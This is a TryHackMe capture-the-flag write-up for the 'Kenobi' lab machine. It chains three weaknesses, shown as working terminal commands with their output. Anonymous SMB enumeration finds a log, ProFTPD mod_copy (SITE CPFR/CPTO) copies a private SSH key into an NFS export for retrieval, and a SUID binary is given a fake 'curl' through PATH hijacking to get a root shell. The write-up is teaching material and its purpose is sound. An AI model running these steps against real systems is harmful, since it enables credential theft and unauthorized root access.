← back to writeups
platform TryHackMe
difficulty Easy

---

Kenobi is an Easy Linux machine that chains three separate vulnerabilities into a full compromise. An anonymous SMB share leaks the location of a private SSH key. ProFTPD 1.3.5's mod_copy module allows unauthenticated file copying, which is used to move the key somewhere NFS exports so it can be retrieved. The final escalation abuses a custom SUID binary that calls curl without a full path, making it vulnerable to PATH hijacking.

Reconnaissance

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sV $TARGET_IP

Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-14 18:02 UTC
Nmap scan report for $TARGET_IP
Host is up (0.031s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100005)
Service Info: Host: KENOBI; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 12.56 seconds

ProFTPD 1.3.5 is immediately worth noting — this version has a known unauthenticated file copy vulnerability in the mod_copy module. Ports 111 and 2049 confirm NFS is running, which becomes the retrieval mechanism. SMB on 139/445 is the first place to enumerate.

SMB Enumeration

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ smbclient -L //$TARGET_IP -N

	Sharename   Type   Comment
	---------   ----   -------
	print$      Disk   Printer Drivers
	anonymous   Disk
	IPC$        IPC    IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ smbclient //$TARGET_IP/anonymous -N

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 11:49:09 2019
  ..                                  D        0  Wed Sep  4 11:49:09 2019
  log.txt                             N    12237  Wed Sep  4 11:49:09 2019

		9204224 blocks of size 1024. 6877112 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (149.9 KiloBytes/sec) (average 149.9 KiloBytes/sec)
smb: \> bye
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ cat log.txt

Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
...
ProFTPD 1.3.5 Server 'ProFTPD Default Installation' [$TARGET_IP]
...

log.txt reveals:

  • An SSH key was generated for user kenobi at /home/kenobi/.ssh/id_rsa
  • ProFTPD is running as the user kenobi

This gives us the exact path of the key to steal and confirms ProFTPD has read access to kenobi's home directory.

NFS Enumeration

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $TARGET_IP

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

/var is exported and mountable by anyone (*). The attack plan: use ProFTPD mod_copy to move the SSH key into /var/tmp, then retrieve it via the NFS mount.

Exploitation — ProFTPD mod_copy

ProFTPD 1.3.5 implements SITE CPFR (copy from) and SITE CPTO (copy to) commands in the mod_copy module. These commands work without any authentication in this version — any connection can copy files the FTP process can read. Connecting with nc directly lets us issue raw FTP protocol commands without an FTP client:

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nc $TARGET_IP 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [$TARGET_IP]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
^C

The SSH key is now at /var/tmp/id_rsa — inside the NFS-exported /var tree.

Initial Access

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ mkdir /mnt/kenobiNFS
┌──(kali㉿kali)-[~]
└─$ mount $TARGET_IP:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~]
└─$ ls /mnt/kenobiNFS/tmp/
id_rsa  systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
┌──(kali㉿kali)-[~]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa /tmp/id_rsa
┌──(kali㉿kali)-[~]
└─$ chmod 600 /tmp/id_rsa

SSH requires private key files to be readable only by the owner (mode 600). Broader permissions cause SSH to reject the key: WARNING: UNPROTECTED PRIVATE KEY FILE! Permissions 0644 for 'id_rsa' are too open.

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ ssh -i /tmp/id_rsa kenobi@$TARGET_IP

The authenticity of host '$TARGET_IP' can't be established.
ECDSA key fingerprint is SHA256:usjA5HAAS3h8dA4/D83q2O5Ib1IkxfYJKCNM2rJO5fk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '$TARGET_IP' (ECDSA) to the list of known hosts.

Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
kenobi@kenobi:~$ cat /home/kenobi/user.txt
d0b0f3f53b6caa532a83915e19224899

Privilege Escalation — SUID + PATH Hijacking

Search for SUID binaries — executables that run as their owner regardless of who launches them:

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null

/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

/usr/bin/menu is not a standard Linux binary. Inspect what it executes:

kenobi@kenobi:~$ strings /usr/bin/menu

/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
...
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig

menu calls curl -I localhost, uname -r, and ifconfig — all by name without absolute paths like /usr/bin/curl. When a process calls a program by name only, the OS searches $PATH directories in order. Placing a malicious script named curl earlier in $PATH than the real curl causes menu to execute it — and because menu is SUID root, the spawned shell runs as root:

kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo '/bin/sh' > curl
kenobi@kenobi:/tmp$ chmod +x curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1

# id
uid=0(root) gid=0(root) groups=0(root),1000(kenobi)
# cat /root/root.txt
$ROOT_FLAG

Key Takeaways

  • Anonymous SMB shares frequently contain configuration files and logs that reveal internal paths, usernames, and service versions. Always enumerate them fully before moving on.
  • ProFTPD 1.3.5 mod_copy (CVE-2015-3306): SITE CPFR/SITE CPTO allow unauthenticated file copying to anywhere the FTP process can write. Connecting with nc and issuing raw FTP commands is faster than searching for a packaged exploit.
  • NFS exports on port 2049 are accessible without credentials if the server exports to *. Port 111 reveals what is exported — run the nfs-showmount script immediately when you see rpcbind.
  • chmod 600 on an SSH private key is not optional. SSH refuses to use keys with broader permissions.
  • find / -perm -u=s -type f 2>/dev/null is the standard first command for Linux privilege escalation enumeration. Non-standard SUID binaries are always the priority to investigate.
  • SUID binaries that call programs without absolute paths are vulnerable to PATH hijacking. strings on the binary reveals what it calls.

References